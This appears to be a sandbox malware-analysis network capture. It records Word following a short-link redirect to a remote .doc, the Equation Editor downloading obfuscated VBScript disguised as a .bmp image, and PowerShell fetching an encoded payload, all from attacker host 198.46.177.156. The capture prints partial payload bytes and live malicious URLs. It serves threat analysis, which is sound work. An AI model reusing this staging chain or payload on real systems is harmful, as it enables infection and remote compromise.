                                  Last-Modified: Sun, 26 May 2024 17:14:39 GMT
                                  ETag: "70ea-6195e893196e9"
                                  Accept-Ranges: bytes
                                  Content-Length: 28906
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: application/msword


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  7192.168.2.224916854.241.153.19280
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 18:35:20.027926922 CEST123OUTOPTIONS / HTTP/1.1
                                  Connection: Keep-Alive
                                  User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                  translate: f
                                  Host: z2.ink
                                  May 27, 2024 18:35:20.640238047 CEST261INHTTP/1.1 404 Not Found
                                  Content-Type: text/html; charset=utf-8
                                  Edge: smart-1.high-performance.network
                                  Date: Mon, 27 May 2024 16:35:20 GMT
                                  Content-Length: 102317
                                  Server: LINKSGPT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Connection: keep-alive
                                  May 27, 2024 18:35:20.640661001 CEST1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c
                                  Data Ascii: <!DOCTYPE html><htmllang=en-US prefix="og: https://ogp.me/ns#"><head><style>img.lazy{min-height:1px}</style><linkrel=preload href=https://d3btrheyejmivy.cloudfront.net/edge/wp-content/plugins/w3-total-cache/pub/js/lazyload.min.js as=script><
                                  May 27, 2024 18:35:20.640697956 CEST1236INData Raw: 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38 74 57 5a 30 50 77 38 36 68 64
                                  Data Ascii: onts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 600;font-stretch: normal;font-display: swap;src: url(h
                                  May 27, 2024 18:35:20.640733957 CEST1236INData Raw: 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 53 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 76 57 62 58 32 76 56 6e 58 42 62 4f 62 6a 32
                                  Data Ascii: c: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVc.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 600;font-stretch: normal;font-display: sw
                                  May 27, 2024 18:35:20.640830994 CEST1236INData Raw: 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 64 69 73 70
                                  Data Ascii: ly: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exg.woff) format('woff');}@font-face {font
                                  May 27, 2024 18:35:20.640986919 CEST1236INData Raw: 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 64 69 73
                                  Data Ascii: ily: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVQ.woff) format('woff');}@font-face {font-f
                                  May 27, 2024 18:35:20.641022921 CEST1236INData Raw: 32 63 6d 71 76 58 6c 57 71 38 74 57 5a 30 50 77 38 36 68 64 30 52 6b 35 68 6b 57 56 34 65 77 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20
                                  Data Ascii: 2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4ewA.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIc
                                  May 27, 2024 18:35:20.641057014 CEST1236INData Raw: 41 2d 55 76 57 62 58 32 76 56 6e 58 42 62 4f 62 6a 32 4f 56 5a 79 4f 4f 53 72 34 64 56 4a 57 55 67 73 69 48 30 42 34 75 61 56 49 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f
                                  Data Ascii: A-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0B4uaVI.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126M
                                  May 27, 2024 18:35:20.641091108 CEST1236INData Raw: 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 38 2e 31 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b
                                  Data Ascii: *//* User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Monoton';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/m
                                  May 27, 2024 18:35:20.641304016 CEST1236INData Raw: 73 3d 21 30 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 7d 2c 6a 51 75 65 72 79 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 7d
                                  Data Ascii: s=!0,jQuery.noConflict},jQuery.ready=function(r){jqueryParams=[...jqueryParams,r]},$.ready=function(r){jqueryParams=[...jqueryParams,r]},jQuery.load=function(r){jqueryParams=[...jqueryParams,r]},$.load=function(r){jqueryParams=[...jqueryParams
                                  May 27, 2024 18:35:20.646074057 CEST1236INData Raw: 20 46 6f 75 6e 64 20 2d 20 42 72 61 6e 64 6c 69 6e 6b 20 45 64 67 65 22 3e 3c 6d 65 74 61 0a 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 6c 61 62 65 6c 31 22 20 63 6f 6e 74 65 6e 74 3d 22 57 72 69 74 74 65 6e 20 62 79 22 3e 3c 6d 65 74 61 0a 6e 61
                                  Data Ascii: Found - Brandlink Edge"><metaname="twitter:label1" content="Written by"><metaname="twitter:data1" content="tianqi"><metaname="twitter:label2" content="Time to read"><metaname="twitter:data2" content="Less than a minute"> <script type=appl


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.224916954.241.153.192801020C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 18:35:20.774620056 CEST130OUTHEAD /nXPJ HTTP/1.1
                                  User-Agent: Microsoft Office Existence Discovery
                                  Host: z2.ink
                                  Content-Length: 0
                                  Connection: Keep-Alive
                                  May 27, 2024 18:35:21.392816067 CEST468INHTTP/1.1 301 Moved Permanently
                                  Content-Type: text/html; charset=utf-8
                                  Edge: smart-1.high-performance.network
                                  Location: http://198.46.177.156/xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc
                                  Date: Mon, 27 May 2024 16:35:20 GMT
                                  Vary: Accept-Encoding
                                  Server: LINKSGPT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Content-Length: 108
                                  Connection: keep-alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  9192.168.2.2249170198.46.177.156801020C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 18:35:21.401210070 CEST279OUTHEAD /xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc HTTP/1.1
                                  User-Agent: Microsoft Office Existence Discovery
                                  Host: 198.46.177.156
                                  Content-Length: 0
                                  Connection: Keep-Alive
                                  May 27, 2024 18:35:21.891515017 CEST321INHTTP/1.1 200 OK
                                  Date: Mon, 27 May 2024 16:35:21 GMT
                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                  Last-Modified: Sun, 26 May 2024 17:14:39 GMT
                                  ETag: "70ea-6195e893196e9"
                                  Accept-Ranges: bytes
                                  Content-Length: 28906
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: application/msword


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  10192.168.2.2249171198.46.177.156803348C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 18:35:24.885535955 CEST339OUTGET /8080/lionarekingofjungleimageshere.bmp HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: 198.46.177.156
                                  Connection: Keep-Alive
                                  May 27, 2024 18:35:25.433310032 CEST1236INHTTP/1.1 200 OK
                                  Date: Mon, 27 May 2024 16:35:25 GMT
                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                  Last-Modified: Sun, 26 May 2024 16:42:50 GMT
                                  ETag: "26a68-6195e175f7c3c"
                                  Accept-Ranges: bytes
                                  Content-Length: 158312
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: image/bmp
                                  Data Raw: ff fe 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 57 00 4d 00 49 00 44 00 61 00 74 00 65 00 53 00 74 00 72 00 69 00 6e 00 67 00 54 00 6f 00 44 00 61 00 74 00 65 00 28 00 64 00 74 00 6d 00 45 00 76 00 65 00 6e 00 74 00 44 00 61 00 74 00 65 00 29 00 0d 00 0a 00 0d 00 0a 00 57 00 4d 00 49 00 44 00 61 00 74 00 65 00 53 00 74 00 72 00 69 00 6e 00 67 00 54 00 6f 00 44 00 61 00 74 00 65 00 20 00 3d 00 20 00 43 00 44 00 61 00 74 00 65 00 28 00 4d 00 69 00 64 00 28 00 64 00 74 00 6d 00 45 00 76 00 65 00 6e 00 74 00 44 00 61 00 74 00 65 00 2c 00 20 00 35 00 2c 00 20 00 32 00 29 00 20 00 26 00 20 00 22 00 2f 00 22 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 4d 00 69 00 64 00 28 00 64 00 74 00 6d 00 45 00 76 00 65 00 6e 00 74 00 44 00 61 00 74 00 65 00 2c 00 20 00 37 00 2c 00 20 00 32 00 29 00 20 00 26 00 20 00 22 00 2f 00 22 00 20 00 26 00 20 00 4c 00 65 00 66 00 74 00 28 00 64 00 74 00 6d 00 45 00 76 00 65 00 6e 00 74 00 44 00 61 00 74 00 65 00 2c 00 20 00 34 00 29 00 20 00 5f 00 0d 00 0a 00 [TRUNCATED]
                                  Data Ascii: Function WMIDateStringToDate(dtmEventDate)WMIDateStringToDate = CDate(Mid(dtmEventDate, 5, 2) & "/" & _Mid(dtmEventDate, 7, 2) & "/" & Left(dtmEventDate, 4) _& " " & Mid (dtmEventDate, 9, 2) & ":" & _Mid(dtmEventDate, 11, 2) & ":" & Mid(dtmEventDate, _13, 2))End Function'////////////////////////////////////////////////////////////////////////////////////////'/////////////////////////////////////////////////////////////////////////////
                                  May 27, 2024 18:35:25.433356047 CEST224INData Raw: 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 67 00 65 00 74 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e 00 28 00 73 00 74 00 72 00 53 00
                                  Data Ascii: ///////////Function getDescription(strSearch,cType)If foundSlUi <> True Then If cType <> "wmi" Then
                                  May 27, 2024 18:35:25.433393002 CEST1236INData Raw: 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 67 00 6c 00 6f 00 62 00 61 00 6c 00 50 00 6f 00 70 00 46 00 61 00 69 00 6c 00 75 00 72 00 65 00 20 00 22 00 73 00 6c 00 75 00 69 00 2e 00 65 00 78 00 65 00 20 00 6e 00 6f 00 74 00 20 00 66 00 6f 00
                                  Data Ascii: globalPopFailure "slui.exe not found.",True quitExit() End IfElse Set objScriptExec = aldeaga
                                  May 27, 2024 18:35:25.433427095 CEST1236INData Raw: 72 00 74 00 73 00 22 00 2c 00 20 00 22 00 2f 00 63 00 6b 00 6d 00 73 00 2d 00 64 00 6f 00 6d 00 61 00 69 00 6e 00 22 00 2c 00 20 00 22 00 2f 00 64 00 70 00 69 00 64 00 22 00 2c 00 20 00 22 00 2f 00 61 00 63 00 74 00 73 00 75 00 62 00 22 00 2c 00
                                  Data Ascii: rts", "/ckms-domain", "/dpid", "/actsub", "/dstatussub" connectWMI nephroge,ultrapassar,folheador,"" per
                                  May 27, 2024 18:35:25.433460951 CEST1236INData Raw: 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 27 00 44 00 69 00 73 00 70 00 6c 00 61 00 79 00 20 00 6c 00 69 00 63 00 65 00 6e 00 73 00 65 00 73 00 74 00 61 00 74 00 75 00 73 00
                                  Data Ascii: 'Display licensestatus for all product keys performLicAction "/poliestesia","",""
                                  May 27, 2024 18:35:25.433495998 CEST1236INData Raw: 66 00 20 00 57 00 69 00 6e 00 37 00 20 00 3d 00 20 00 54 00 72 00 75 00 65 00 20 00 54 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 61 00 6e 00 69 00 6c 00 61 00 64 00 6f 00 20 00 4d 00
                                  Data Ascii: f Win7 = True Then anilado MSG_EVENT_1016,"desapaixonar","1016","Office Software Protection Platform Service"
                                  May 27, 2024 18:35:25.433528900 CEST1236INData Raw: 31 00 37 00 2c 00 22 00 64 00 65 00 73 00 61 00 70 00 61 00 69 00 78 00 6f 00 6e 00 61 00 72 00 22 00 2c 00 22 00 31 00 30 00 31 00 37 00 22 00 2c 00 22 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2d 00 57 00 69 00 6e 00 64 00 6f 00
                                  Data Ascii: 17,"desapaixonar","1017","Microsoft-Windows-Security-SPP",nephroge anilado MSG_EVENT_1013,"desapaixonar","101
                                  May 27, 2024 18:35:25.433562994 CEST1236INData Raw: 6c 00 74 00 72 00 61 00 70 00 61 00 73 00 73 00 61 00 72 00 2c 00 66 00 6f 00 6c 00 68 00 65 00 61 00 64 00 6f 00 72 00 2c 00 22 00 72 00 65 00 67 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 70 00 65 00 72 00 66 00 6f 00
                                  Data Ascii: ltrapassar,folheador,"reg" performRegAction langorosamente Case "/osppsvcrestart", "/osppsvcauto" c
                                  May 27, 2024 18:35:25.433595896 CEST1236INData Raw: 78 00 69 00 74 00 28 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 43 00 61 00 73 00 65 00 20 00 22 00 2f 00 76 00 65 00 72 00 73 00 69 00 6f 00 6e 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 67 00 6c 00 6f 00 62 00 61 00
                                  Data Ascii: xit() Case "/version" globalPopSuccess VER_INFO,True Case Else pos = InStr(langorosamente,":")
                                  May 27, 2024 18:35:25.433634043 CEST1000INData Raw: 6c 00 65 00 63 00 74 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 53 00 65 00 6c 00 65 00 63 00 74 00 20 00 43 00 61 00 73 00 65 00 20 00 67 00 65 00 74 00 43 00 6f 00
                                  Data Ascii: lect Select Case getCommand Case "/skms-domain", "/actype", "/inpkey", "/unpkey", "/inslic
                                  May 27, 2024 18:35:25.438817978 CEST1236INData Raw: 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 49 00 66 00 20 00 67 00 65 00 74 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 20 00 3d 00 20 00 22 00 2f 00 64 00 64 00 65 00 73 00 63 00 72 00 22 00 20 00 54 00 68 00 65 00 6e 00 0d 00 0a 00
                                  Data Ascii: If getCommand = "/ddescr" Then If Left(strValue,2) = "0x" Then getD


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  11192.168.2.2249175198.46.177.156803620C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 18:35:44.389811993 CEST76OUTGET /8080/RBG.txt HTTP/1.1
                                  Host: 198.46.177.156
                                  Connection: Keep-Alive
                                  May 27, 2024 18:35:44.883718967 CEST1236INHTTP/1.1 200 OK
                                  Date: Mon, 27 May 2024 16:35:44 GMT
                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                  Last-Modified: Sun, 26 May 2024 16:39:15 GMT
                                  ETag: "c558-6195e0a9ce944"
                                  Accept-Ranges: bytes
                                  Content-Length: 50520
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/plain
                                  Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                  Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                  May 27, 2024 18:35:44.883805990 CEST224INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                  May 27, 2024 18:35:44.883842945 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                  May 27, 2024 18:35:44.883877993 CEST224INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                  May 27, 2024 18:35:44.883908033 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                  May 27, 2024 18:35:44.883940935 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                  May 27, 2024 18:35:44.883974075 CEST448INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                  May 27, 2024 18:35:44.884007931 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                  May 27, 2024 18:35:44.884042978 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
